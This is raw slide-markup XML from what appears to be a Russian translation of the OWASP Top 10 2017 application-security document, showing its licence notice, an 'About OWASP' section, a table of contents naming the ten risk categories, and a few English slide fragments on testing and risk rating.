              </a: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ru-RU" sz="95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ru-RU" sz="950">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> and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ru-RU" sz="95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Testing Strategies</a:t>
              </a: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1050" b="1" baseline="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ru-RU" sz="1050" b="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> and Accuracy</a:t>
              </a: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ru-RU" sz="95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in the tools development teams are already using, not PDF files.</a:t>
              </a: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Understand the Threat Model</a:t>
            </a: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SDLC</a:t>
            </a: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ru-RU" sz="1050" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Clearly Communicate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="1050" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Findings</a:t>
            </a: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414527930"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="8001000"/>
          <a:ext cx="6858000" cy="1163874"/>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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Авторские права и Лицензирование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aseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Авторские права © 2003 - 2017 Фонд OWASP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aseline="0" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans"/>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000" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Документ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>выпущен под лицензией Creative Commons Attribution Share-Alike 4.0. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>В случае переиспользования или распространения данного документа необходимо указывать условия лицензионного соглашения, действующие в его отношении.</a:t>
                      </a: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ru-RU"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Содержание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rtl="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27869037"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3428998" y="969684"/>
          <a:ext cx="3429002" cy="7167820"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429002">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="350460">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Об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8871">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Открытый проект по обеспечению безопасности веб-приложений (OWASP) — это открытое сообщество, призывающее организации разрабатывать, приобретать и поддерживать безопасные приложения и интерфейсы прикладного программирования (API). </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP бесплатно и в открытом доступе предлагает:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="just">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стандарты и инструменты для обеспечения безопасности приложений;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="just">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подробные книги по тестированию безопасности приложений, разработке безопасного кода, а также оценке безопасности кода;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="just">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презентации и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>видео</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="just">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7"/>
                        </a:rPr>
                        <a:t>памятки</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> по большинству распространенных вопросов;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="just">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стандартные требования к безопасности и библиотеки;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="just">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8"/>
                        </a:rPr>
                        <a:t>локальные отделения по всему миру</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="just">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передовые исследования;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="just">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крупные </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>конференции по всему миру</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="just">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10"/>
                        </a:rPr>
                        <a:t>списки рассылок</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Более подробная информация доступна на сайте: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Все инструменты, документы, видео, презентации и отделения OWASP являются бесплатными и открытыми для тех, кто заинтересован в улучшении безопасности приложений. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Фонд выступает за подход к безопасности приложений с точки зрения проблемы людей, процессов и технологий, поскольку для наиболее эффективного обеспечения безопасности приложений требуются улучшения во всех этих областях.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP представляет собой новый тип организации. Наша независимость от коммерческого влияния позволяет нам предоставлять беспристрастные, практические и эффективные данные по безопасности приложений. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP не связан ни с одной технологической компанией, хотя поддерживает использование технологий промышленной безопасности. OWASP выпускает большое количество материалов, действуя прозрачно и открыто, а также всегда готов к сотрудничеству.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Фонд OWASP является некоммерческой организацией, что обеспечивает проекту долгосрочный успех. Почти все связанные с OWASP люди являются добровольцами, включая членов совета OWASP, руководителей отделений и проектов, а также участников проекта.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Мы поддерживаем инновационные исследования в области безопасности, предоставляя гранты и инфраструктуру.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Присоединяйтесь к нам!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С</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Содержание</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2528746158"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1352190"/>
          <a:ext cx="3383280" cy="66827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Предисловие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В</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Введение</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ПВ</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Примечания к выпуску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 безопасности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приложений</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65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ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Т10</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Топ-10 угроз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a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:b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OWASP – 2017	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>………</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">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Внедрение	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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Недостатки аутентификации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865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Разглашение конфиденциальных данных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Внешние сущности XML (XXE)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Недостатки контроля доступа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7865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Некорректная настройка параметров безопасности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7865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Межсайтовое выполнение сценариев (XSS)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7865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Небезопасная десериализация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37865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Использование компонентов с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известными</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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уязвимостями .…………………………</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378655">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aseline="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Недостатки журналирования и мониторинга	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="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разработчикам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тестировщикам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организациям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менеджерам приложений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Об угрозах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+К</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О категориях угроз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+МД</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Методология и данные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23476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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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Благодарности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8024992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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Your Application Security Program Now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Applica</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950"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p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>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ru-RU" sz="950" baseline="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and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="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+O</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">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2936556164"/>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ru-RU" sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Manage the Full Application Lifecycle</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ru-RU" sz="950" b="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 as technical counterpart to the application owner. The application manager is in charge of the whole</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="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lifecycle from the IT perspective, from collecting the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="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p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="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endParaRPr lang="ru-RU" sz="900" b="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+A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Application </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Managers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2898346603"/>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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>It’s About the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> Risks that Weaknesses Represent</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sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> defines numerous factors to help calculate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="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weakness </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(</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prevalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, detectability,</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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) and one</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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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b="1" baseline="0">
